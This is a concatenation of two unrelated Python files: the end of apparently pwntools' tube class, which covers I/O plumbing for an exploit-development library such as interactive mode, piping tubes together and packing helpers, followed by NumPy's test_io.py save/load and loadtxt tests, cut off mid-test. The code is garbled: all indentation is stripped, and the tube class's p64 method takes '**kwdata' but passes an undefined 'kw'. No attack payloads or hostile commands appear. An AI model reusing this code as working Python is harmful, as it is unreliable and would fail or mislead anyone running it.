data = term.readline.readline(prompt = prompt, float = True)
else:
data = sys.stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go.set()
self.info('Got EOF while sending in interactive')
else:
go.set()
except KeyboardInterrupt:
self.info('Interrupted')
go.set()
while t.is_alive():
t.join(timeout = 0.1)
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
If ``timeout`` is zero, only cached data will be cleared.
Note: If timeout is set to zero, the underlying network is
not actually polled; only the internal buffer is cleared.
Returns:
All data received
Examples:
>>> t = tube()
>>> t.unrecv('clean me up')
>>> t.clean(0)
'clean me up'
>>> len(t.buffer)
0
"""
if timeout == 0:
return self.buffer.get()
return self.recvrepeat(timeout)
def clean_and_log(self, timeout = 0.05):
r"""clean_and_log(timeout = 0.05)
Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs recieved
data with :meth:`pwnlib.self.info`.
Returns:
All data received
Examples:
>>> def recv(n, data=['', 'hooray_data']):
... while data: return data.pop()
>>> t = tube()
>>> t.recv_raw = recv
>>> t.connected_raw = lambda d: True
>>> t.fileno = lambda: 1234
>>> with context.local(log_level='info'):
... data = t.clean_and_log() #doctest: +ELLIPSIS
[DEBUG] Received 0xb bytes:
'hooray_data'
>>> data
'hooray_data'
>>> context.clear()
"""
with context.local(log_level='debug'):
return self.clean(timeout)
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> import time
>>> _=(b.connect_input(a), time.sleep(0.1))
data
"""
def pump():
import sys as _sys
while self.countdown_active():
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if not data:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = context.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> _=(a.connect_output(b), time.sleep(0.1))
data
"""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
return subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
"""
Shorthand for connecting multiple tubes.
See :meth:`connect_input` for more information.
Examples:
The following are equivalent ::
tube_a >> tube.b
tube_a.connect_input(tube_b)
This is useful when chaining multiple tubes ::
tube_a >> tube_b >> tube_a
tube_a.connect_input(tube_b)
tube_b.connect_input(tube_a)
"""
self.connect_input(other)
return other
def __rshift__(self, other):
"""
Inverse of the ``<<`` operator. See :meth:`__lshift__`.
See :meth:`connect_input` for more information.
"""
self.connect_output(other)
return other
def __ne__(self, other):
"""
Shorthand for connecting tubes to eachother.
The following are equivalent ::
a >> b >> a
a <> b
See :meth:`connect_input` for more information.
"""
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds.
Examples:
>>> import time
>>> t = tube()
>>> t.can_recv_raw = lambda *a: False
>>> t.can_recv()
False
>>> _=t.unrecv('data')
>>> t.can_recv()
True
>>> _=t.recv()
>>> t.can_recv()
False
"""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
Examples:
>>> t = tube()
>>> t.settimeout_raw = lambda t: None
>>> t.settimeout(3)
>>> t.timeout == 3
True
"""
self.timeout = timeout
shutdown_directions = {
'in': 'recv',
'read': 'recv',
'recv': 'recv',
'out': 'send',
'write': 'send',
'send': 'send',
}
connected_directions = shutdown_directions.copy()
connected_directions['any'] = 'any'
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
Closes the tube for futher reading or writing depending on `direction`.
Arguments:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
Examples:
>>> def p(x): print x
>>> t = tube()
>>> t.shutdown_raw = p
>>> _=map(t.shutdown, ('in', 'read', 'recv', 'out', 'write', 'send'))
recv
recv
recv
send
send
send
>>> t.shutdown('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.shutdown_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.shutdown_directions))
else:
self.shutdown_raw(self.shutdown_directions[direction])
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Arguments:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
Doctest:
>>> def p(x): print x
>>> t = tube()
>>> t.connected_raw = p
>>> _=map(t.connected, ('any', 'in', 'read', 'recv', 'out', 'write', 'send'))
any
recv
recv
recv
send
send
send
>>> t.connected('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['any', 'in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.connected_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.connected_directions))
else:
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
Examples:
.. doctest::
>>> t = tube()
>>> def p(x): print x
>>> t.close = lambda: p("Closed!")
>>> with t: pass
Closed!
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement
See :meth:`__enter__`
"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout, it should return None, in case
of a closed connection it should raise an ``exceptions.EOFError``.
"""
raise EOFError('Not implemented')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
Should return ``exceptions.EOFError``, if it is unable to send any
more, because of a close tube.
"""
raise EOFError('Not implemented')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
raise NotImplementedError()
def timeout_change(self):
"""
Informs the raw layer of the tube that the timeout has changed.
Should not be called directly.
Inherited from :class:`Timeout`.
"""
try:
self.settimeout_raw(self.timeout)
except NotImplementedError:
pass
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True, if
there is data available within the timeout, but
ignores the buffer on the object.
"""
raise NotImplementedError()
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
raise NotImplementedError()
def close(self):
"""close()
Closes the tube.
"""
pass
# Ideally we could:
# raise NotImplementedError()
# But this causes issues with the unit tests.
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
raise NotImplementedError()
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
raise NotImplementedError()
#: Alias for :meth:`recv`
def read(self, *a, **kw): return self.recv(*a, **kw)
#: Alias for :meth:`recvpred`
def readpred(self, *a, **kw): return self.recvpred(*a, **kw)
#: Alias for :meth:`recvn`
def readn(self, *a, **kw): return self.recvn(*a, **kw)
#: Alias for :meth:`recvuntil`
def readuntil(self, *a, **kw): return self.recvuntil(*a, **kw)
#: Alias for :meth:`recvlines`
def readlines(self, *a, **kw): return self.recvlines(*a, **kw)
#: Alias for :meth:`recvline`
def readline(self, *a, **kw): return self.recvline(*a, **kw)
#: Alias for :meth:`recvline_pred`
def readline_pred(self, *a, **kw): return self.recvline_pred(*a, **kw)
#: Alias for :meth:`recvline_contains`
def readline_contains(self, *a, **kw): return self.recvline_contains(*a, **kw)
#: Alias for :meth:`recvline_startswith`
def readline_startswith(self, *a, **kw): return self.recvline_startswith(*a, **kw)
#: Alias for :meth:`recvline_endswith`
def readline_endswith(self, *a, **kw): return self.recvline_endswith(*a, **kw)
#: Alias for :meth:`recvregex`
def readregex(self, *a, **kw): return self.recvregex(*a, **kw)
#: Alias for :meth:`recvline_regex`
def readline_regex(self, *a, **kw): return self.recvline_regex(*a, **kw)
#: Alias for :meth:`recvrepeat`
def readrepeat(self, *a, **kw): return self.recvrepeat(*a, **kw)
#: Alias for :meth:`recvall`
def readall(self, *a, **kw): return self.recvall(*a, **kw)
#: Alias for :meth:`send`
def write(self, *a, **kw): return self.send(*a, **kw)
#: Alias for :meth:`sendline`
def writeline(self, *a, **kw): return self.sendline(*a, **kw)
#: Alias for :meth:`sendafter`
def writeafter(self, *a, **kw): return self.sendafter(*a, **kw)
#: Alias for :meth:`sendlineafter`
def writelineafter(self, *a, **kw): return self.sendlineafter(*a, **kw)
#: Alias for :meth:`sendthen`
def writethen(self, *a, **kw): return self.sendthen(*a, **kw)
#: Alias for :meth:`sendlinethen`
def writelinethen(self, *a, **kw): return self.sendlinethen(*a, **kw)
def p64(self, *a, **kwdata): return self.send(packing.p64(*a, **kw))
def p32(self, *a, **kw): return self.send(packing.p32(*a, **kw))
def p16(self, *a, **kw): return self.send(packing.p16(*a, **kw))
def p8(self, *a, **kw): return self.send(packing.p8(*a, **kw))
def pack(self, *a, **kw): return self.send(packing.pack(*a, **kw))
def u64(self, *a, **kw): return packing.u64(self.recvn(8), *a, **kw)
def u32(self, *a, **kw): return packing.u32(self.recvn(4), *a, **kw)
def u16(self, *a, **kw): return packing.u16(self.recvn(2), *a, **kw)
def u8(self, *a, **kw): return packing.u8(self.recvn(1), *a, **kw)
def unpack(self, *a, **kw): return packing.unpack(self.recvn(context.bytes), *a, **kw)
def flat(self, *a, **kw): return self.send(packing.flat(*a,**kw))
|
test_io.py
|
from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
from tempfile import mkstemp, mktemp, NamedTemporaryFile
import time
import warnings
import gc
from io import BytesIO
from datetime import datetime
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConverterLockError, \
ConversionWarning
from numpy.compat import asbytes, asbytes_nested, bytes, asstr
from nose import SkipTest
from numpy.ma.testutils import (TestCase, assert_equal, assert_array_equal,
assert_raises, run_module_suite)
from numpy.testing import assert_warns, assert_, build_err_msg
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
@np.testing.dec.skipif(not IS_64BIT, "Works only with 64bit systems")
@np.testing.dec.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
tmp = mktemp(suffix='.npz')
a = np.empty(L, dtype=np.uint8)
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a']
npfile.close()
os.remove(tmp)
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
fp = open(tmp, 'rb', 10000)
fp.seek(0)
assert_(not fp.closed)
_ = np.load(fp)['data']
assert_(not fp.closed) # must not get closed by .load(opened fp)
fp.seek(0)
assert_(not fp.closed)
finally:
fp.close()
os.remove(tmp)
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
os.remove(tmp)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it.
# This needs to pass a file name to load for the
# test.
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overiden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
def test_header_footer(self):
"""
Test the functionality of the header and footer keyword argument.
"""
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=np.int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
def _assert_floatstr_lines_equal(actual_lines, expected_lines):
"""A string comparison function that also works on Windows + Python 2.5.
This is necessary because Python 2.5 on Windows inserts an extra 0 in
the exponent of the string representation of floating point numbers.
Only used in TestSaveTxt.test_complex_arrays, no attempt made to make this
more generic.
Once Python 2.5 compatibility is dropped, simply use `assert_equal` instead
of this function.
"""
for actual, expected in zip(actual_lines, expected_lines):
if actual != expected:
expected_win25 = expected.replace("e+00", "e+000")
if actual != expected_win25:
msg = build_err_msg([actual, expected], '', verbose=True)
raise AssertionError(msg)
class TestLoadTxt(TestCase):
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, b'1 21\r3 42\r')
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = { 'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = { 'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([ 72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
